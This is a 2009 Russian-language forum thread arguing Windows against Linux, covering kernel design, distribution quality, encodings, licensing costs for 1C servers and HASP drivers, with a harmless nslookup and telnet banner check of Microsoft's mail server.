И совсем не вкурил я про "мультиядерность". переведите, что вы имели в виду?
CTPEK03A
06.02.2009, 21:44
А можно узнать с какого перепуга вы глюк конкверора отнесли к глюкам линукса? :)
А вот в том-то и дело, что собственно акромя самого ядра GNU/Linux - там в основном только глюки и остаются. Вся ОС такая: ядро + много....много.... много левх, и той, или иной степени глючностей- пакетов.
Причем по тупейшей причине это происходит: ведь не смотря на хвалёную открытость "сырцов", ни один из дистромейкеров - не удосуживается проверить ни одну строчку этих кодов! И лепит и лепит глюки. Главное - это побольше пакетов, глючных и разных! Но шоб побольше! Не важно, что половина глючит, а вторая половина никогда никому не понадобиться... Не важно! Главное чтоб их было 2000-3000 тысячи :eek:
До смешного доходит: к примеру родная локаль у дистриба - уникод, а некоторые приложения из состава этого же дистрибутива - всё равно хотят работать под KOI8-R. :umora: А почему? А потому, что вхреначили этот пакет "не глядючи". Это явление в просторечии называется "распиз...во", батенька!
Банальная халтура и халатность.
Иногда, одни и те же глюки - качуют из дистриба в дистриб, по версиям, из года в год. Всем на всех нас...ть. (В отличии от BSD к стати.)
И совсем не вкурил я про "мультиядерность". переведите, что вы имели в виду? Мультиядерность? Перевести? С какого на какой?! С русского же на русский, что ли? По-моему, в нете есть 1000 и 1 источник, посвященный описанию ядер NT. Там подробнейшим образом, перечисленны все ядра NT, структура, взаимодействие с железом, взаимодействие с сервисами, и взаимодействие с прикладным п\о пользователя. Нда-с... NT - гибридная, (мультиядерная)ОС. Её можно было бы смело назвать микроядерной, если бы не размер более 1мб, и некоторое отступление от чисто-канонического микроядра (в ядре (в одном из..) системы находится, например, ещё и модуль графического интерфейса).
До смешного доходит: к примеру родная локаль у дистриба - уникод, а некоторые приложения из состава этого же дистрибутива - всё равно хотят работать под KOI8-R. :umora: А почему? А потому, что вхреначили этот пакет "не глядючи". Это явление в просторечии называется "распиз...во", батенька!
Про "родную локаль" для дистрибутива это вы вообще полную глупость сморозили, это вам не DOS. Да, есть софт, который не умеет работать с юникодом. Но это проблемы конкретных разработчиков, а не дистрибутива. Кстати, я юникодом не пользуюсь, по причине его полной неудобности для меня как человека, сталкивающимся с текстами в куче различных кодировок.
И может быть Вам показать программы, которые вполне работают под виндой, но показывают умляюты вместо русского? :) Или вы мне скажете, что ни разу не лазили в HKLM\SYSTEM\ControlSet001\Control\Nls\CodePage и у вас все работает без проблем? :)
Про "кучу пакетов лишь бы было" это вы основываясь на чем такой диагноз линуксу ставите? Опять на альте? Может быть на генте? Там вообще чтобы попасть в основное дерево портеджей надо очень постараться. С остальными дистрибутивами ситуация тоже похожая. Если используете Unstable ветки с кучами софта - то это только ваши проблемы. Вас же всегда предупреждают об этом.
CTPEK03A
07.02.2009, 20:14
Про "родную локаль" для дистрибутива это вы вообще полную глупость сморозили, это вам не DOS.
Да при чем тут давно мертвая dos? Вообще ни при чем. Можно конечно и в линуксе и винде, не особо как хитрым макаром запускать любое приложение под любую кодировку. Но дело-то не в этом. А собственно в самой халтурности сборки. "После установки - обработайте напильником до желаемой формы и функциональности."
Причем, эта "обработка" может занять фиг его знает сколько времени.
Да, есть софт, который не умеет работать с юникодом. Но это проблемы конкретных разработчиков, а не дистрибутива. Нетъ. Это как раз проблемы криволапой сборки дистромейкера. Собрать дистрибутив рабочий и удобный - это не просто понапихать внего всяческого говнеца, а наверное буквально каждый пакет проверить, отдебажить и отрихтовать должным образом. А этого-то, как раз никто из дистромейкеров и не делает.
Или вы мне скажете, что ни разу не лазили в HKLM\SYSTEM\ControlSet001\Control\Nls\CodePage и у вас все работает без проблем? :) Никогда. Всё работает без проблем. Я даже и не знаю где это и для чего оно вообще нужно. :P
Надоел мне этот спор...читаете ответы между строк, передергиваете, аргументация отсутствует как класс.
Думаю тему можно закрыть или даже просто удалить
DogEater
07.02.2009, 21:22
Присоединюсь к Waso. Тема обсуждалась миллиарды раз на других форумах. Оппоненты так и не смогли убедить друг друга. Диалог превратился в набор монологов.
Оно нам надо?
Schalker
07.02.2009, 22:53
Надоел мне этот спор...читаете ответы между строк, передергиваете, аргументация отсутствует как класс.
Думаю тему можно закрыть или даже просто удалить
Вот это правильно. Любителей сладкой мелкософтинщы никогда не переубедишь.
Давайте все воскрикнем " Ура Винде ". Поплошало :lol:
Не спора ради,а лишь личным опытом поделиться. Ярые защитники микрософта либо не профессионалы, либо уставшие люди. в 90-х слишком много людей "примазалось" к славному цеху " обработчиков данных".
Правда и то,что до 2003 года Мелкософт лидировал . Но какой год на дворе ?
Я по работе отвечаю за полсотни серверов . клиентов , к радости ученики обсуживают. Почти каждый месяц веду споры о "защите и обоснованности инвестиций".
Я не вижу на сегодняшний день НИ ОДНОГО продукта Мелкософта, на который стоило бы тратить инвестиции.
Ну а в части клиентов- могу дать совет. Найдите старый Пентиум-4 и поставьте на него Ubuntu c http://ubuntu.ru/.
Вот тогда и будете говорить с " просвещенными :dance:
CTPEK03A
08.02.2009, 00:20
:fool:
2009год от Р.Х. Сайт со статистикой тут: www.netcraft.com.
На десктопах линух почетно занимает свои 0,99%, и постепенно уступает на срверах.
Я не вижу на сегодняшний день НИ ОДНОГО продукта Мелкософта, на который стоило бы тратить инвестиции.Очки себе купите. ;) И потом... Киса, я Вам как менагер менагеру говорю: инвестиции не тратят! Это тупо. Зарубите это себе на носу:их или привлекают, или делают с целью извлечения выгоды.(прибыли.)
Ну а в части клиентов- могу дать совет. Найдите старый Пентиум-4 и поставьте на него Ubuntu c http://ubuntu.ru/.
Вот тогда и будете говорить с " просвещенными :dance::lol:
Послушайте, "гуру"! Очнитесь! Я с Вас валяюсь! :lol: Я не то что там на какой-то "старый Р4", а аж на "целик мобайл" в 1,5Ггц, и 256 метров RAM устанавливал:
Виста Ультимэйт(как мне это удалось в принципе - отдельный разговор.Для профессионалов ;))
Убунта "Интерпидричный козёл" 8.10
Тык вот: вся "Каноникал" вместе с Шатллвортом - сосёт не переставая у Свисты. Причем в любом режиме. Причем с минимумом необходимых запущенных сервисов, и даже без гуйни. Ога... Как по быстродействию, так и по отказоустойчивости. Я это уже все проходил, и с Убунтой плотно знаком еще с шестых версий. Плавали - знаем.
Послушайте, "гуру"! Очнитесь! Я с Вас валяюсь! :lol: Я не то что там на какой-то "старый Р4", а аж на "целик мобайл" в 1,5Ггц, и 256 метров RAM устанавливал:
Виста Ультимэйт(как мне это удалось в принципе - отдельный разговор.Для профессионалов ;))
Убунта "Интерпидричный козёл" 8.10
То есть мне на голенькую торрентокачалку-раздавалку (AXP 2500+, заторможен до 1,1GHz, 2 Gb RAM, режим 24/7) с доступом только по сети Вы порекомендуете купить (:eek:, не будете же Вы рекомендовать украсть) Висту? Да она стоит дороже всего этого компа...
Сейчас там стоит убунта сервер 8.10. Гуёв никаких, из ПО только rtorrent, screen и mc.
Добавлено через 4 часа 27 минут
Догадался снять с торрентокачалки видяху (странно что раньше в голову не приходило). Доволен :D
Винда может работать без видяхи?
=SF=Andre
08.02.2009, 14:08
Лично я доволен серверной виндой.
Так моя жизнь сложилась, что ещё на коленках паяли 286-е, да синклеры, приходилось иметь дело и с Атари.
Так вот, что я могу сказать Вам дорогие любители обрабатывать танк натфилем, ничто так не дорого, как личное время. Если Вам его не жалко, молитесь на пингвина. А мне лично, для моих задач "далеко не вселенского масштаба", достаточно того, что есть. То есть, то, что мне необходимо работает стабильно, быстро и качественно, чего и Вам желаю.:rtfm:
Молитесь уж Вы:) А применять с умом стоит, в зависимости от целей и задач, пример, малое/среднее предприятие, больше 20 в 1с v8 стоимость внедрения на Винде - более полумилиона (учитывая все лицензии на винду и sql сервер) стоимость на linuxe - 130..150 т. рублей - т.е требуются только лицензия на 1с так что же выгоднее? Настроить под 1с linux сервак сможет админ средней руки и стоимость поддержки не сильно разнится, а при хорошо подобранном оборудовании работает примерно с одинаковой степенью надёжности.
Вообще, серверная винда далеко не плохая вещь, и на своих местах бывает не заменима, но цена/качество не самый крайний параметр, особенно сейчас когда все массово начали пересчитывать цены импортируемого товара, тем более попробуйте у частного предпринимателя в глубинке выбить сумму хотя б в 1000 у.е. на диск в коробочке.
Кроме того есть куча мест где надо применить серверную систему, но второстепенность задач вполне позволяет использовать не Windows: тарификаторы, системы доступа, видеонаблюдения, почта, маршрутизаторы и т.п. - где вполне потянет малая машина и цена внедрения будет зависеть от её стоимости и стоимости вашего рабочего времени, да и перед законом будете чисты.
CTPEK03A
09.02.2009, 02:13
То есть мне на голенькую торрентокачалку-раздавалку (AXP 2500+, заторможен до 1,1GHz, 2 Gb RAM, режим 24/7) с доступом только по сети Вы порекомендуете купить (:eek:, не будете же Вы рекомендовать украсть) Висту? Да она стоит дороже всего этого компа...
Нет, не посоветую. Висты_ххххххх - клиентские ОС и делать из них сервера левыми средствами не разумно, по меньшей мере. .
Добавлено через 4 часа 27 минут
Догадался снять с торрентокачалки видяху (странно что раньше в голову не приходило). Доволен :D
Винда может работать без видяхи?
Сервера от M$ не нуждаются в видеокартах, клавиатурах, мышках и т.д. и т.п. для своей нормальной работы. Как и любой серверный продукт. RTFM.
Добавлено через 11 минут
Молитесь уж Вы:) А применять с умом стоит, в зависимости от целей и задач, пример, малое/среднее предприятие, больше 20 в 1с v8 стоимость внедрения на Винде - более полумилиона (учитывая все лицензии на винду и sql сервер) стоимость на linuxe - 130..150 т. рублей - т.е требуются только лицензия на 1с
Э! Э...! Э!.. Стоп, стоп, стоп... А клиенты 1с у вас на чем будут работать? Тут, я так мыслю : - только два путя есть. Либо покупать продукт и подписку Wine@Etersoft (уж не станете ли вы ее красть?!) и она тоже больших денёг стоит, либо опять-таки ставить клиентов на винду. Упсссс... Приехали, да? Сервер - это еще только половина айсберга.
К стати: а как обстоят дела в linux с фирменными драйверами для ключей HASP от Aladdin?
Поскольку я наблюдаю, официально потдерживаемое драверами компании "Аладдин" ядро GNU\Linux имеет версию 2.4.хх. Вот так вот. Чуете негибкость? От и я - "осчусчаю". Тут или так: или старое ядро и работающие ключи, или вообще никак. Нормалёк? Нда.. Не совсем вроде как.
Вот вам и "прелести" монолитно-модульного ядра. M$ от такого ушли еще во времена DOS. И ныне, NT ядру совершенно пофигу, какое дряхлое\новое железо ему дают, и каков номер версии его драйвера. (Главное- это что бы он вообще был. Драйвер-то этот. :D, что увы - не всегда так есть. Хардмейкеры - засранцы. Тут уж ничего не попишешь.)
mAd!Duke
09.02.2009, 08:29
К стати: а как обстоят дела в linux с фирменными драйверами для ключей HASP от Aladdin?
C 1C не работал, но даже я знаю - официальный ответ официального саппорта 1С у нас в городе - вот вам кряк, ставьке его. Так стабильнее.
И не надо ругать систему портов в BSD - работал и с тем и с другим. Система портов удобнее и надежнее.
to CTPEK03A: я про серверную часть выражался (в предыдущем посте сравнение только серверных частей по стоимости, что уже не мало), а подписка кстати на Wine@Etersoft подешевле уж Vista и XP ( те же 20 машин по Винде XP prof и Виста Бизнес цены вы знаете, а Wine@Etersoft 45900.00 руб корпоративный версия SQL).
По алладину - на 32 битных системах проблем с ним не встречал, на 64 bit дилер 1с рекомендовал заменить ключ.
CTPEK03A
09.02.2009, 20:18
C 1C не работал, но даже я знаю - официальный ответ официального саппорта 1С у нас в городе - вот вам кряк, ставьке его. Так стабильнее.
Этот ответ и незаконен, ибо нарушает соглашение с 1С, и куда как совсем не лучший для системы, ибо добавляет в нее сервис-службу, которая никем никогда ни на что не тестировалась на какие-либо параметры и отказоустойчивость. В случае чего - Соболь заявки не принимает. Это раз.
Во вторых - эмульятор hasp работает с NT-ядром на уровне драйвера. Это всё понятно. Вопрос то в другом! Как его засобачить в Wine? Ото ж! Боюсь, что это невозможно в принципе. Т.к. wine = wine is not emulator. В противном случае, у linux-сообщества не существовало бы проблем с win-модемами, специфичным железом, отсутствием нативных драйверов для множества win-железа под linux- в принципе. Но, увы...
И не надо ругать систему портов в BSD - работал и с тем и с другим. Система портов удобнее и надежнее.
+ один миллион!
Добавлено через 11 минут
to CTPEK03A: я про серверную часть выражался (в предыдущем посте сравнение только серверных частей по стоимости, что уже не мало), а подписка кстати на Wine@Etersoft подешевле уж Vista и XP ( те же 20 машин по Винде XP prof и Виста Бизнес цены вы знаете, а Wine@Etersoft 45900.00 руб корпоративный версия SQL).
По алладину - на 32 битных системах проблем с ним не встречал, на 64 bit дилер 1с рекомендовал заменить ключ.
Дык ведь, покупать-то надо- не 33 коробочки с дистрибуивом windows по рыночной цене, а 1 корпоративную версию. И все... И цены быстро-быстро уравниваются.
Помыслите: фирменный сервер от Hewlett-Packard ( сама кробочка 2.0 GHz Intel Celeron 64-Bit Processor, 750 GB Hard Drive,) + с уже предустановленным WHS стоит от 500$. :P Это ж замечательная цена, вообще! 500 у.е. из расчета использования на 8-10 лет, это стоимость владения по 55$ в год.
корпоротивная сколько стоит? и есть смысл на 20 машин? да и пример приводил я относитльно сервера - там выгода вам очевидна?
И массовая доля таких предприятий в стране думаю тоже очевидна, как и производительность приведённого Вами сервера..
Просто так...вдруг не все баш почитывают изредка.
waso@localhost ~ $ nslookup -q=mx microsoft.com
Server: aaa.bbb.ccc.ddd
Address: ddd.ddd.ddd.ddd#53
Non-authoritative answer:
microsoft.com mail exchanger = 10 mail.global.frontbridge.com.
Authoritative answers can be found from:
microsoft.com nameserver = ns4.msft.net.
microsoft.com nameserver = ns5.msft.net.
microsoft.com nameserver = ns1.msft.net.
microsoft.com nameserver = ns2.msft.net.
microsoft.com nameserver = ns3.msft.net.
waso@localhost ~ $ telnet mail.global.frontbridge.com 25
Trying 216.32.181.22...
Connected to mail.global.frontbridge.com.
Escape character is '^]'.
220 mail161-wa4.bigfish.com ESMTP Postfix EGGS and Butter
^^^^^^^
quit
221 Bye
Connection closed by foreign host.
Забавно...где же эксченж сервер? :)
DogEater
12.02.2009, 09:51
Просто так...вдруг не все баш почитывают изредка.
waso@localhost ~ $ nslookup -q=mx microsoft.com
Server: aaa.bbb.ccc.ddd
Address: ddd.ddd.ddd.ddd#53
Non-authoritative answer:
microsoft.com mail exchanger = 10 mail.global.frontbridge.com.
Authoritative answers can be found from:
microsoft.com nameserver = ns4.msft.net.
microsoft.com nameserver = ns5.msft.net.
microsoft.com nameserver = ns1.msft.net.
microsoft.com nameserver = ns2.msft.net.
microsoft.com nameserver = ns3.msft.net.
waso@localhost ~ $ telnet mail.global.frontbridge.com 25
Trying 216.32.181.22...
Connected to mail.global.frontbridge.com.
Escape character is '^]'.
220 mail161-wa4.bigfish.com ESMTP Postfix EGGS and Butter
^^^^^^^
quit
221 Bye
Connection closed by foreign host.
Забавно...где же эксченж сервер? :)
Гы. Ты ещё вспомни как в "Хоттабыче" рутом на microsoft.com через телнет лазили...
Гы. Ты ещё вспомни как в "Хоттабыче" рутом на microsoft.com через телнет лазили...
А причем здесь "Хоттабыч"?
FilippOk
12.02.2009, 14:18
Да при том, что Постфикс - не показатель.
Сервер настраивал сисадмин, и ему надо было "чтоб работало", а не чтобы "обязательно от Microsoft".
Он и выбрал то, с чем привык работать и глюки чего знает.
P.S. Есть мыслЯ закрыть тему. Потому что "опять". Как смотрим, камрады?
DogEater
12.02.2009, 15:54
http://www.sukhoi.ru/forum/showpost.php?p=1199811&postcount=48
http://www.sukhoi.ru/forum/showpost.php?p=1199798&postcount=47
orthodox
12.02.2009, 15:55
удалить
NichtLanden
12.02.2009, 16:07
Дык ведь, покупать-то надо- не 33 коробочки с дистрибуивом windows по рыночной цене, а 1 корпоративную версию. И все... И цены быстро-быстро уравниваются.
======================================================
Что то я не вижу большой разницы между ОЕМ и OLP NL в прайс-листах Микрософт.......При закупке от 50 штук для госа дадут небольшую скидку и то на серверные продукты, при закупке OLP NL AE - там реально ценник будет в десятки раз меньше - так как тут MS спецом сливает в ноль что бы из школ и институтов выходили зомби заточенные под Винды - игра на то что преподавательский состав в учебных заведениях у нас скажем так в ИТ туповат и не склонен к самостоятельному обучению, ну а родное государство нихрена не чесалось пока было до хрена халявных нефтебаксов
P.S По теме - альтернатива конечна нужна, но MS так замонополизировал рынок SOHO и офисных приложений что мама не горюй.....
Сервер настраивал сисадмин, и ему надо было "чтоб работало", а не чтобы "обязательно от Microsoft".
Объединить со старыми , чего уж удалять.
Баннер, выдаваемый сервером, вообще не показатель ничего. И сюда его кинул просто так.
А тема абсолютно бесполезная в итоге вышла.
=SF=Andre
13.02.2009, 20:33
======================================================
Что то я не вижу большой разницы между ОЕМ и OLP NL в прайс-листах Микрософт.......При закупке от 50 штук для госа дадут небольшую скидку и то на серверные продукты, при закупке OLP NL AE - там реально ценник будет в десятки раз меньше - так как тут MS спецом сливает в ноль что бы из школ и институтов выходили зомби заточенные под Винды - игра на то что преподавательский состав в учебных заведениях у нас скажем так в ИТ туповат и не склонен к самостоятельному обучению, ну а родное государство нихрена не чесалось пока было до хрена халявных нефтебаксов
P.S По теме - альтернатива конечна нужна, но MS так замонополизировал рынок SOHO и офисных приложений что мама не горюй.....
Да ладно, в своё время кроме DOS и Нортана ничего не знали, "окна" на самом деле это был шаг вперёд. Наши "аля" военные специалисты до сих пор, ничего путного не сделали, всё на тектильном уровне. Ещё раз скажу и буду прав, нельзя делить и судить то, что вне понимания, вам дали куски разного пирога, один пирог чуть дороже, другой дешевле. Что дали, то и будете есть, аля специалисты, Вас как бандерлогов обучили азам и всё, а Вы тут спорите, жалкое зрелище. Но в конечном итоге, Российские программисты ничего не предоставили, ничего толкового не родили. Точка. У нас в нашей стране нет конкурентного программного продукта. Что нам дали, то и юзаем. Так вот, други мои, эксплуатировать - это совсем не то, что бы сделать своими руками.
Вот это правильно. Любителей сладкой мелкософтинщы никогда не переубедишь.
Давайте все воскрикнем " Ура Винде ". Поплошало :lol:
Не спора ради,а лишь личным опытом поделиться. Ярые защитники микрософта либо не профессионалы, либо уставшие люди. в 90-х слишком много людей "примазалось" к славному цеху " обработчиков данных".
Я по работе отвечаю за полсотни серверов . клиентов , к радости ученики обсуживают. Почти каждый месяц веду споры о "защите и обоснованности инвестиций".
Я не вижу на сегодняшний день НИ ОДНОГО продукта Мелкософта, на который стоило бы тратить инвестиции.
Вот тогда и будете говорить с " просвещенными :dance:
У меня к примеру на "старом" пентиуме 4D (двухяд.) стоит уже полтора года ультиматная виста, не тормозит, даже фаллаут3 на почти мах настройках, для справки. А вот когда-то давно, в первой половине и в середине 90-х стояли у меня и полуось (лицензионная) и линух, не помню какой, их тогда всего то было 1-2 диста. Первый виндовс, который мне понравился был ХР, до него раз в 3-4 месяца переустанавливал 98миллениум, 95-й вообще принципиально не ставил - бред какой то был с окошечками, жил на досе с 3.11.
Так вот, нравилась мне больше всего, как простому пользователю (но дотошному) полуось, сейчас мне виста нравится, все кто её ругают "просто её не пробовали"! А линух как был сборищем неизвестно чего, и неизвестно для чего - так им и остался. Он прocpал свой шанс в настолках и ноутбуках, так же как OpenGL в играх последнему директ иксу. Мне нужна абсолютно (ну или почти :)) надёжная и абсолютно совместимая система, я НЕ ХОЧУ БЕСПЛАТНО корчить из себя программулькина!!! И мне смешно сегодня читать опусы в форумах про глюки линюха почти пятнадцатилетней давности, да и кому их надо то исправлять, всё равно ВСЕ МЫ к 2010-му перейдём на 7-ку.
И не надо пожалуйста, молодежь, обижать стариков. Среди моих знакомых есть такие зубры - у которых любой модный "гений" cocёт по полной, молодёжь по сравнению с ними на 99.999% просто кодировщики.
А про "инвеситиции" - повеселил. Покажите мне "инвеситиции" в линюх, серъёзные такие, кроме китайцев - там у них советский строй ещё.
Проснитесь, линухоиды - нету уже никакого линукса, нету! Он умирает на персоналках. Направьте свой пыл лучше на FreeBSD или на виндовс.
P.S. Можно назвать этот пост "исповедь простого пользователя". :D
NichtLanden
13.02.2009, 23:49
Проснитесь, линухоиды - нету уже никакого линукса, нету! Он умирает на персоналках. Направьте свой пыл лучше на FreeBSD или на виндовс.
===========================
А мужики то не знают - все тырнеты и крупные ЦОД сидят на nix:D:D